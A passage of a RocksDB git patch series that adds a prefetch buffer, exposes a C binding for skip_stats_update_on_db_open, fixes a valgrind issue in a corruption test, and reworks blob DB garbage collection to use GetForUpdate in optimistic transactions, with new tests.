prefetch_buffer */, + file_size_, kPlainTableMagicNumber, ioptions_, + PlainTableIndexBuilder::kPlainTableIndexBlock, + &index_block_contents); bool index_in_file = s.ok(); @@ -301,9 +302,9 @@ Status PlainTableReader::PopulateIndex(TableProperties* props, bool bloom_in_file = false; // We only need to read the bloom block if index block is in 
file. if (index_in_file) { - s = ReadMetaBlock(file_info_.file.get(), file_size_, kPlainTableMagicNumber, - ioptions_, BloomBlockBuilder::kBloomBlock, - &bloom_block_contents); + s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */, + file_size_, kPlainTableMagicNumber, ioptions_, + BloomBlockBuilder::kBloomBlock, &bloom_block_contents); bloom_in_file = s.ok() && bloom_block_contents.data.size() > 0; } diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index e6322f8b4d9..fa89e6cdd6a 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -79,7 +79,8 @@ Status SstFileReader::GetTableReader(const std::string& file_path) { file_.reset(new RandomAccessFileReader(std::move(file), file_path)); if (s.ok()) { - s = ReadFooterFromFile(file_.get(), file_size, &footer); + s = ReadFooterFromFile(file_.get(), nullptr /* prefetch_buffer */, + file_size, &footer); } if (s.ok()) { magic_number = footer.table_magic_number(); diff --git a/util/file_reader_writer.cc b/util/file_reader_writer.cc index 22ab7128781..f46b78fa06b 100644 --- a/util/file_reader_writer.cc +++ b/util/file_reader_writer.cc @@ -603,6 +603,34 @@ class ReadaheadRandomAccessFile : public RandomAccessFile { }; } // namespace +Status FilePrefetchBuffer::Prefetch(RandomAccessFileReader* reader, + uint64_t offset, size_t n) { + size_t alignment = reader->file()->GetRequiredBufferAlignment(); + uint64_t roundup_offset = Roundup(offset, alignment); + uint64_t roundup_len = Roundup(n, alignment); + buffer_.Alignment(alignment); + buffer_.AllocateNewBuffer(roundup_len); + + Slice result; + Status s = + reader->Read(roundup_offset, roundup_len, &result, buffer_.BufferStart()); + if (s.ok()) { + buffer_offset_ = roundup_offset; + buffer_len_ = result.size(); + } + return s; +} + +bool FilePrefetchBuffer::TryReadFromCache(uint64_t offset, size_t n, + Slice* result) const { + if (offset < buffer_offset_ || offset + n > buffer_offset_ + buffer_len_) { + return false; + } + uint64_t offset_in_buffer = offset - buffer_offset_; + *result = Slice(buffer_.BufferStart() + offset_in_buffer, n); + return true; +} + std::unique_ptr NewReadaheadRandomAccessFile( std::unique_ptr&& file, size_t readahead_size) { std::unique_ptr result( diff --git a/util/file_reader_writer.h b/util/file_reader_writer.h index deed73c38df..9be6924582b 100644 --- a/util/file_reader_writer.h +++ b/util/file_reader_writer.h @@ -196,6 +196,17 @@ class WritableFileWriter { Status SyncInternal(bool use_fsync); }; +class FilePrefetchBuffer { + public: + Status Prefetch(RandomAccessFileReader* reader, uint64_t offset, size_t n); + bool TryReadFromCache(uint64_t offset, size_t n, Slice* result) const; + + private: + AlignedBuffer buffer_; + uint64_t buffer_offset_; + size_t buffer_len_; +}; + extern Status NewWritableFile(Env* env, const std::string& fname, unique_ptr* result, const EnvOptions& options); From ac098a4626a386ca0ab3662e907b23f9037ba9f9 Mon Sep 17 00:00:00 2001 From: Kent767 Date: Fri, 11 Aug 2017 12:13:46 -0700 Subject: [PATCH 098/205] expose set_skip_stats_update_on_db_open to C bindings Summary: It would be super helpful to not have to recompile rocksdb to get this performance tweak for mechanical disks. I have signed the CLA. 
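For context, a minimal sketch of how a client could use the new option from the C API (illustrative only, not part of this patch; the database path /tmp/rocksdb_example is assumed):

#include <stdio.h>
#include <stdlib.h>
#include "rocksdb/c.h"

int main(void) {
  rocksdb_options_t* options = rocksdb_options_create();
  rocksdb_options_set_create_if_missing(options, 1);
  /* Skip the SST file scan that updates stats at open time; this is the
     performance tweak for mechanical disks mentioned above. */
  rocksdb_options_set_skip_stats_update_on_db_open(options, 1);

  char* err = NULL;
  rocksdb_t* db = rocksdb_open(options, "/tmp/rocksdb_example", &err);
  if (err != NULL) {
    fprintf(stderr, "open failed: %s\n", err);
    free(err);
    return 1;
  }
  rocksdb_close(db);
  rocksdb_options_destroy(options);
  return 0;
}

The binding maps directly to Options::skip_stats_update_on_db_open, as the db/c.cc hunk below shows.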
Closes https://github.com/facebook/rocksdb/pull/2718

Differential Revision: D5606994

Pulled By: yiwu-arbug

fbshipit-source-id: c05e92bad0d03bd38211af1e1ced0d0d1e02f634
---
 db/c.cc             | 4 ++++
 include/rocksdb/c.h | 2 ++
 2 files changed, 6 insertions(+)

diff --git a/db/c.cc b/db/c.cc
index 6952660a1b8..788eab68afb 100644
--- a/db/c.cc
+++ b/db/c.cc
@@ -2102,6 +2102,10 @@ void rocksdb_options_enable_statistics(rocksdb_options_t* opt) {
   opt->rep.statistics = rocksdb::CreateDBStatistics();
 }

+void rocksdb_options_set_skip_stats_update_on_db_open(rocksdb_options_t* opt, unsigned char val) {
+  opt->rep.skip_stats_update_on_db_open = val;
+}
+
 void rocksdb_options_set_num_levels(rocksdb_options_t* opt, int n) {
   opt->rep.num_levels = n;
 }
diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h
index 077030775f7..838d7b0c951 100644
--- a/include/rocksdb/c.h
+++ b/include/rocksdb/c.h
@@ -763,6 +763,8 @@ rocksdb_options_set_max_bytes_for_level_multiplier_additional(
     rocksdb_options_t*, int* level_values, size_t num_levels);
 extern ROCKSDB_LIBRARY_API void rocksdb_options_enable_statistics(
     rocksdb_options_t*);
+extern ROCKSDB_LIBRARY_API void rocksdb_options_set_skip_stats_update_on_db_open(
+    rocksdb_options_t* opt, unsigned char val);

 /* returns a pointer to a malloc()-ed, null terminated string */
 extern ROCKSDB_LIBRARY_API char* rocksdb_options_statistics_get_string(

From 6f051e0c71d18dac88b8d96b8c534b6711a3a9f8 Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Fri, 11 Aug 2017 12:18:58 -0700
Subject: [PATCH 099/205] fix corruption_test valgrind

Summary:
Closes https://github.com/facebook/rocksdb/pull/2724

Differential Revision: D5613416

Pulled By: ajkr

fbshipit-source-id: ed55fb66ab1b41dfdfe765fe3264a1c87a8acb00
---
 db/corruption_test.cc | 1 +
 1 file changed, 1 insertion(+)

diff --git a/db/corruption_test.cc b/db/corruption_test.cc
index 608c88d597d..56e157832c2 100644
--- a/db/corruption_test.cc
+++ b/db/corruption_test.cc
@@ -332,6 +332,7 @@ TEST_F(CorruptionTest, TableFileIndexData) {
   // corrupt an index block of an entire file
   Corrupt(kTableFile, -2000, 500);
   Reopen();
+  dbi = reinterpret_cast<DBImpl*>(db_);
   // one full file should be readable, since only one was corrupted
   // the other file should be fully non-readable, since index was corrupted
   Check(5000, 5000);

From e5a1b727c0ebd028c647649489e008c7d7840ee7 Mon Sep 17 00:00:00 2001
From: yiwu-arbug
Date: Fri, 11 Aug 2017 12:30:02 -0700
Subject: [PATCH 100/205] Fix blob DB transaction usage while GC

Summary:
During GC, blob DB uses an optimistic transaction to delete or replace the
index entry in the LSM, to guarantee correctness if there is a normal write
to the same key. However, the previous implementation neither calls
SetSnapshot() nor uses GetForUpdate() from the transaction API; instead it
does its own sequence-number check before beginning the transaction. A
normal write can sneak in after the sequence-number check and overwrite the
key, and GC will then delete or relocate the old version of the key by
mistake. Update the code to properly use GetForUpdate() to check the
existing index entry. After this patch the sequence number stored with each
blob record is useless, so I'm considering removing the sequence number
from the blob record in another patch.
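For reference, the read-modify-write pattern described above looks roughly like this against the public OptimisticTransactionDB API (a standalone sketch, not code from this patch; the hypothetical helper UpdateIfUnchanged stands in for the per-record logic inside GCFileAndUpdateLSM):

#include <string>
#include "rocksdb/utilities/optimistic_transaction_db.h"
#include "rocksdb/utilities/transaction.h"

// Replace the value of `key` with `new_value` only if it still equals
// `expected`. GetForUpdate() tracks the key in the transaction, so a write
// that sneaks in between the read and Commit() makes Commit() return
// Status::Busy instead of clobbering the newer version.
rocksdb::Status UpdateIfUnchanged(rocksdb::OptimisticTransactionDB* txn_db,
                                  const std::string& key,
                                  const std::string& expected,
                                  const std::string& new_value) {
  rocksdb::Transaction* txn = txn_db->BeginTransaction(rocksdb::WriteOptions());
  std::string value;
  rocksdb::Status s = txn->GetForUpdate(rocksdb::ReadOptions(), key, &value);
  if (s.ok() && value == expected) {
    txn->Put(key, new_value);
    s = txn->Commit();  // Status::Busy here means a conflicting write won.
  }
  delete txn;
  return s;
}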
Closes https://github.com/facebook/rocksdb/pull/2703 Differential Revision: D5589178 Pulled By: yiwu-arbug fbshipit-source-id: 8dc960cd5f4e61b36024ba7c32d05584ce149c24 --- utilities/blob_db/blob_db_impl.cc | 320 ++++++++++++++++----------- utilities/blob_db/blob_db_impl.h | 11 +- utilities/blob_db/blob_db_test.cc | 103 +++++++-- utilities/blob_db/blob_log_reader.cc | 5 +- utilities/blob_db/blob_log_reader.h | 4 +- 5 files changed, 293 insertions(+), 150 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 9e1623eb5c4..a15fe4a18ab 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -30,6 +30,7 @@ #include "util/logging.h" #include "util/mutexlock.h" #include "util/random.h" +#include "util/sync_point.h" #include "util/timer_queue.h" #include "utilities/transactions/optimistic_transaction_db_impl.h" #include "utilities/transactions/optimistic_transaction.h" @@ -951,6 +952,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value_unc, uint64_t expiration) { + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); MutexLock l(&write_mutex_); UpdateWriteOptions(options); @@ -1022,6 +1024,7 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, CloseIf(bfile); + TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); return s; } @@ -1655,8 +1658,8 @@ std::pair BlobDBImpl::WaStats(bool aborted) { // DELETED in the LSM //////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, - GCStats* gcstats) { - uint64_t tt = EpochNow(); + GCStats* gc_stats) { + uint64_t now = EpochNow(); std::shared_ptr reader = bfptr->OpenSequentialReader(env_, db_options_, env_options_); @@ -1679,8 +1682,6 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool first_gc = bfptr->gc_once_after_open_; ColumnFamilyHandle* cfh = bfptr->GetColumnFamily(db_); - auto cfhi = reinterpret_cast(cfh); - auto cfd = cfhi->cfd(); bool has_ttl = header.HasTTL(); // this reads the key but skips the blob @@ -1688,7 +1689,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, assert(opt_db_); - bool no_relocation_ttl = (has_ttl && tt > bfptr->GetTTLRange().second); + bool no_relocation_ttl = (has_ttl && now >= bfptr->GetTTLRange().second); bool no_relocation_lsmdel = false; { @@ -1707,136 +1708,199 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, BlobLogRecord record; std::shared_ptr newfile; std::shared_ptr new_writer; - - while (reader->ReadRecord(&record, shallow).ok()) { - gcstats->blob_count++; - - bool del_this = false; - bool reloc_this = false; - - // TODO(yiwu): The following logic should use GetForUpdate() from - // optimistic transaction to check if the key is current, otherwise - // there can be another writer sneak in between sequence number of - // and the deletion. 
-
-    // this particular TTL has expired
-    if (no_relocation_ttl || (has_ttl && tt > record.GetTTL())) {
-      del_this = true;
-    } else if (!first_gc) {
-      SequenceNumber seq = kMaxSequenceNumber;
-      bool found_record_for_key = false;
-      SuperVersion* sv = db_impl_->GetAndRefSuperVersion(cfd);
-      if (sv == nullptr) {
-        Status result =
-            Status::InvalidArgument("Could not access column family 0");
-        return result;
-      }
-      Status s1 = db_impl_->GetLatestSequenceForKey(
-          sv, record.Key(), false, &seq, &found_record_for_key);
-      if (found_record_for_key && seq == record.GetSN()) {
-        reloc_this = true;
+  Transaction* transaction = nullptr;
+  uint64_t blob_offset = 0;
+  bool retry = false;
+
+  static const WriteOptions kGarbageCollectionWriteOptions = []() {
+    WriteOptions write_options;
+    // TODO(yiwu): Disable WAL for garbage collection to make it compatible
+    // with use cases that don't use WAL. However, without WAL there are at
+    // least two issues with crash:
+    // 1. If a key is dropped from blob file (e.g. due to TTL), right before a
+    // crash, the key may still be present in the LSM after restart.
+    // 2. If a key is relocated to another blob file, right before a crash,
+    // after restart the new offset may be lost with the old offset pointing
+    // to the removed blob file.
+    // We need to have a better recovery mechanism to address these issues.
+    write_options.disableWAL = true;
+    // It is ok to ignore column families that were dropped.
+    write_options.ignore_missing_column_families = true;
+    return write_options;
+  }();
+
+  while (true) {
+    assert(s.ok());
+    if (retry) {
+      // Retry in case the transaction fails with Status::TryAgain.
+      retry = false;
+    } else {
+      // Read the next blob record.
+      Status read_record_status =
+          reader->ReadRecord(&record, shallow, &blob_offset);
+      // Exit if we reach the end of blob file.
+      // TODO(yiwu): properly handle ReadRecord error.
+      if (!read_record_status.ok()) {
+        break;
+      }
+      gc_stats->blob_count++;
+    }

-    if (del_this) {
-      gcstats->num_deletes++;
-      gcstats->deleted_size += record.GetBlobSize();
-      if (first_gc) continue;
-
-      Transaction* txn = opt_db_->BeginTransaction(
-          write_options_, OptimisticTransactionOptions(), nullptr);
-      txn->Delete(cfh, record.Key());
-      Status s1 = txn->Commit();
-      // chances that this DELETE will fail is low. If it fails, it would be
-      // because a new version of the key came in at this time, which will
-      // override the current version being iterated on.
-      if (!s1.IsBusy()) {
-        // assume that failures happen due to new writes.
- gcstats->overrided_while_delete++; - } - delete txn; - } + transaction = + opt_db_->BeginTransaction(kGarbageCollectionWriteOptions, + OptimisticTransactionOptions(), transaction); - if (reloc_this) { - if (!newfile) { - // new file - std::string reason("GC of "); - reason += bfptr->PathName(); - newfile = NewBlobFile(reason); - gcstats->newfile = newfile; - - new_writer = CheckOrCreateWriterLocked(newfile); - newfile->header_ = std::move(header); - // Can't use header beyond this point - newfile->header_valid_ = true; - newfile->file_size_ = BlobLogHeader::kHeaderSize; - s = new_writer->WriteHeader(newfile->header_); - - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "File: %s - header writing failed", - newfile->PathName().c_str()); - return s; - } + std::string index_entry; + Status get_status = transaction->GetForUpdate(ReadOptions(), cfh, + record.Key(), &index_entry); + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate"); + if (get_status.IsNotFound()) { + // Key has been deleted. Drop the blob record. + continue; + } + if (!get_status.ok()) { + s = get_status; + ROCKS_LOG_ERROR(db_options_.info_log, + "Error while getting index entry: %s", + s.ToString().c_str()); + break; + } - WriteLock wl(&mutex_); + // TODO(yiwu): We should have an override of GetForUpdate returning a + // PinnableSlice. + Slice index_entry_slice(index_entry); + BlobHandle handle; + s = handle.DecodeFrom(&index_entry_slice); + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Error while decoding index entry: %s", + s.ToString().c_str()); + break; + } + if (handle.filenumber() != bfptr->BlobFileNumber() || + handle.offset() != blob_offset) { + // Key has been overwritten. Drop the blob record. + continue; + } - dir_change_.store(true); - blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); + // If key has expired, remove it from base DB. + if (no_relocation_ttl || (has_ttl && now >= record.GetTTL())) { + gc_stats->num_deletes++; + gc_stats->deleted_size += record.GetBlobSize(); + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"); + transaction->Delete(cfh, record.Key()); + Status delete_status = transaction->Commit(); + if (delete_status.ok()) { + gc_stats->delete_succeeded++; + } else if (delete_status.IsBusy()) { + // The key is overwritten in the meanwhile. Drop the blob record. + gc_stats->overwritten_while_delete++; + } else if (delete_status.IsTryAgain()) { + // Retry the transaction. + retry = true; + } else { + // We hit an error. + s = delete_status; + ROCKS_LOG_ERROR(db_options_.info_log, + "Error while deleting expired key: %s", + s.ToString().c_str()); + break; } + // Continue to next blob record or retry. + continue; + } - gcstats->num_relocs++; - std::string index_entry; + if (first_gc) { + // Do not relocate blob record for initial GC. + continue; + } - uint64_t blob_offset = 0; - uint64_t key_offset = 0; - // write the blob to the blob log. 
- s = new_writer->AddRecord(record.Key(), record.Blob(), &key_offset, - &blob_offset, record.GetTTL()); - - BlobHandle handle; - handle.set_filenumber(newfile->BlobFileNumber()); - handle.set_size(record.Blob().size()); - handle.set_offset(blob_offset); - handle.set_compression(bdb_options_.compression); - handle.EncodeTo(&index_entry); - - new_writer->AddRecordFooter(record.GetSN()); - newfile->blob_count_++; - newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + - record.Blob().size() + BlobLogRecord::kFooterSize; - - Transaction* txn = opt_db_->BeginTransaction( - write_options_, OptimisticTransactionOptions(), nullptr); - txn->Put(cfh, record.Key(), index_entry); - Status s1 = txn->Commit(); - // chances that this Put will fail is low. If it fails, it would be - // because a new version of the key came in at this time, which will - // override the current version being iterated on. - if (s1.IsBusy()) { - ROCKS_LOG_INFO(db_options_.info_log, - "Optimistic transaction failed: %s put bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); - } else { - gcstats->succ_relocs++; - ROCKS_LOG_DEBUG(db_options_.info_log, - "Successfully added put back into LSM: %s bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); + // Relocate the blob record to new file. + if (!newfile) { + // new file + std::string reason("GC of "); + reason += bfptr->PathName(); + newfile = NewBlobFile(reason); + gc_stats->newfile = newfile; + + new_writer = CheckOrCreateWriterLocked(newfile); + newfile->header_ = std::move(header); + // Can't use header beyond this point + newfile->header_valid_ = true; + newfile->file_size_ = BlobLogHeader::kHeaderSize; + s = new_writer->WriteHeader(newfile->header_); + + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "File: %s - header writing failed", + newfile->PathName().c_str()); + break; } - delete txn; - } - } - if (gcstats->newfile) total_blob_space_ += newfile->file_size_; + WriteLock wl(&mutex_); - ROCKS_LOG_INFO(db_options_.info_log, - "File: %s Num deletes %" PRIu32 " Num relocs: %" PRIu32 - " Succ Deletes: %" PRIu32 " Succ relocs: %" PRIu32, - bfptr->PathName().c_str(), gcstats->num_deletes, - gcstats->num_relocs, gcstats->succ_deletes_lsm, - gcstats->succ_relocs); + dir_change_.store(true); + blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); + } + + gc_stats->num_relocate++; + std::string new_index_entry; + uint64_t new_blob_offset = 0; + uint64_t new_key_offset = 0; + // write the blob to the blob log. + s = new_writer->AddRecord(record.Key(), record.Blob(), &new_key_offset, + &new_blob_offset, record.GetTTL()); + + BlobHandle new_handle; + new_handle.set_filenumber(newfile->BlobFileNumber()); + new_handle.set_size(record.Blob().size()); + new_handle.set_offset(new_blob_offset); + new_handle.set_compression(bdb_options_.compression); + new_handle.EncodeTo(&new_index_entry); + + new_writer->AddRecordFooter(record.GetSN()); + newfile->blob_count_++; + newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + + record.Blob().size() + BlobLogRecord::kFooterSize; + + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); + transaction->Put(cfh, record.Key(), new_index_entry); + Status put_status = transaction->Commit(); + if (put_status.ok()) { + gc_stats->relocate_succeeded++; + } else if (put_status.IsBusy()) { + // The key is overwritten in the meanwhile. Drop the blob record. 
+      gc_stats->overwritten_while_relocate++;
+    } else if (put_status.IsTryAgain()) {
+      // Retry the transaction.
+      // TODO(yiwu): On retry, we can reuse the new blob record.
+      retry = true;
+    } else {
+      // We hit an error.
+      s = put_status;
+      ROCKS_LOG_ERROR(db_options_.info_log, "Error while relocating key: %s",
+                      s.ToString().c_str());
+      break;
+    }
+  }  // end of ReadRecord loop
+
+  if (transaction != nullptr) {
+    delete transaction;
+  }
+  ROCKS_LOG_INFO(
+      db_options_.info_log,
+      "%s blob file %" PRIu64
+      ". Total blob records: %" PRIu64 ", Deletes: %" PRIu64 "/%" PRIu64
+      " succeeded, Relocates: %" PRIu64 "/%" PRIu64 " succeeded.",
+      s.ok() ? "Successfully garbage collected" : "Failed to garbage collect",
+      bfptr->BlobFileNumber(), gc_stats->blob_count, gc_stats->delete_succeeded,
+      gc_stats->num_deletes, gc_stats->relocate_succeeded,
+      gc_stats->num_relocate);
+  if (newfile != nullptr) {
+    total_blob_space_ += newfile->file_size_;
+    ROCKS_LOG_INFO(db_options_.info_log, "New blob file %" PRIu64 ".",
+                   newfile->BlobFileNumber());
+  }
   return s;
 }
 
@@ -2119,15 +2183,17 @@ std::pair<bool, int64_t> BlobDBImpl::RunGC(bool aborted) {
   // in this collect the set of files, which became obsolete
   std::vector<std::shared_ptr<BlobFile>> obsoletes;
   for (auto bfile : to_process) {
-    GCStats gcstats;
-    Status s = GCFileAndUpdateLSM(bfile, &gcstats);
-    if (!s.ok()) continue;
+    GCStats gc_stats;
+    Status s = GCFileAndUpdateLSM(bfile, &gc_stats);
+    if (!s.ok()) {
+      continue;
+    }
 
     if (bfile->gc_once_after_open_.load()) {
       WriteLock lockbfile_w(&bfile->mutex_);
 
-      bfile->deleted_size_ = gcstats.deleted_size;
-      bfile->deleted_count_ = gcstats.num_deletes;
+      bfile->deleted_size_ = gc_stats.deleted_size;
+      bfile->deleted_count_ = gc_stats.num_deletes;
       bfile->gc_once_after_open_ = false;
     } else {
       obsoletes.push_back(bfile);
diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h
index d812604bef5..6247fa22b79 100644
--- a/utilities/blob_db/blob_db_impl.h
+++ b/utilities/blob_db/blob_db_impl.h
@@ -137,10 +137,13 @@ struct GCStats {
   uint64_t blob_count = 0;
   uint64_t num_deletes = 0;
   uint64_t deleted_size = 0;
-  uint64_t num_relocs = 0;
-  uint64_t succ_deletes_lsm = 0;
-  uint64_t overrided_while_delete = 0;
-  uint64_t succ_relocs = 0;
+  uint64_t retry_delete = 0;
+  uint64_t delete_succeeded = 0;
+  uint64_t overwritten_while_delete = 0;
+  uint64_t num_relocate = 0;
+  uint64_t retry_relocate = 0;
+  uint64_t relocate_succeeded = 0;
+  uint64_t overwritten_while_relocate = 0;
   std::shared_ptr<BlobFile> newfile = nullptr;
 };
 
diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc
index 9f3ae1b012f..28d4d5b8dea 100644
--- a/utilities/blob_db/blob_db_test.cc
+++ b/utilities/blob_db/blob_db_test.cc
@@ -15,6 +15,7 @@
 #include "util/cast_util.h"
 #include "util/random.h"
 #include "util/string_util.h"
+#include "util/sync_point.h"
 #include "util/testharness.h"
 #include "utilities/blob_db/blob_db_impl.h"
 
@@ -177,7 +178,7 @@ TEST_F(BlobDBTest, PutWithTTL) {
   for (size_t i = 0; i < 100; i++) {
     uint64_t ttl = rnd.Next() % 100;
     PutRandomWithTTL("key" + ToString(i), ttl, &rnd,
-                     (ttl < 50 ? nullptr : &data));
+                     (ttl <= 50 ?
nullptr : &data)); } mock_env_->set_now_micros(100 * 1000000); auto *bdb_impl = static_cast(blob_db_); @@ -188,7 +189,7 @@ TEST_F(BlobDBTest, PutWithTTL) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -206,7 +207,7 @@ TEST_F(BlobDBTest, PutUntil) { for (size_t i = 0; i < 100; i++) { uint64_t expiration = rnd.Next() % 100 + 50; PutRandomUntil("key" + ToString(i), expiration, &rnd, - (expiration < 100 ? nullptr : &data)); + (expiration <= 100 ? nullptr : &data)); } mock_env_->set_now_micros(100 * 1000000); auto *bdb_impl = static_cast(blob_db_); @@ -217,7 +218,7 @@ TEST_F(BlobDBTest, PutUntil) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -249,7 +250,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(0, gc_stats.num_deletes); - ASSERT_EQ(100, gc_stats.num_relocs); + ASSERT_EQ(100, gc_stats.num_relocate); VerifyDB(data); } @@ -263,7 +264,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { std::string * /*new_value*/, bool * /*value_changed*/) override { *ttl = rnd->Next() % 100; - if (*ttl >= 50) { + if (*ttl > 50) { data[key.ToString()] = value.ToString(); } return true; @@ -295,7 +296,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -310,7 +311,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { std::string * /*new_value*/, bool * /*value_changed*/) override { *expiration = rnd->Next() % 100 + 50; - if (*expiration >= 100) { + if (*expiration > 100) { data[key.ToString()] = value.ToString(); } return true; @@ -342,7 +343,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -385,7 +386,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { std::string value_ttl = value + "ttl:"; PutFixed64(&value_ttl, ttl); ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value_ttl))); - if (ttl >= 50) { + if (ttl > 50) { data[key] = value; } } @@ -398,7 +399,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); - ASSERT_EQ(data.size(), gc_stats.num_relocs); + ASSERT_EQ(data.size(), gc_stats.num_relocate); VerifyDB(data); } @@ -534,9 +535,7 @@ TEST_F(BlobDBTest, MultipleWriters) { i)); std::map data; for (size_t i = 0; i < 10; i++) { - if (workers[i].joinable()) { - workers[i].join(); - } + workers[i].join(); data.insert(data_set[i].begin(), data_set[i].end()); } VerifyDB(data); @@ -579,7 +578,7 @@ TEST_F(BlobDBTest, SequenceNumber) { } } -TEST_F(BlobDBTest, 
GCShouldKeepKeysWithNewerVersion) { +TEST_F(BlobDBTest, GCAfterOverwriteKeys) { Random rnd(301); BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; @@ -612,11 +611,83 @@ TEST_F(BlobDBTest, GCShouldKeepKeysWithNewerVersion) { } GCStats gc_stats; ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(200, gc_stats.blob_count); ASSERT_EQ(0, gc_stats.num_deletes); - ASSERT_EQ(200 - new_keys, gc_stats.num_relocs); + ASSERT_EQ(200 - new_keys, gc_stats.num_relocate); VerifyDB(data); } +TEST_F(BlobDBTest, GCRelocateKeyWhileOverwritting) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1")); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); + SyncPoint::GetInstance()->EnableProcessing(); + + auto writer = port::Thread( + [this]() { ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v2")); }); + + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(1, gc_stats.blob_count); + ASSERT_EQ(0, gc_stats.num_deletes); + ASSERT_EQ(1, gc_stats.num_relocate); + ASSERT_EQ(0, gc_stats.relocate_succeeded); + ASSERT_EQ(1, gc_stats.overwritten_while_relocate); + writer.join(); + VerifyDB({{"foo", "v2"}}); +} + +TEST_F(BlobDBTest, GCExpiredKeyWhileOverwritting) { + Random rnd(301); + Options options; + options.env = mock_env_.get(); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options, options); + mock_env_->set_now_micros(100 * 1000000); + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200)); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + 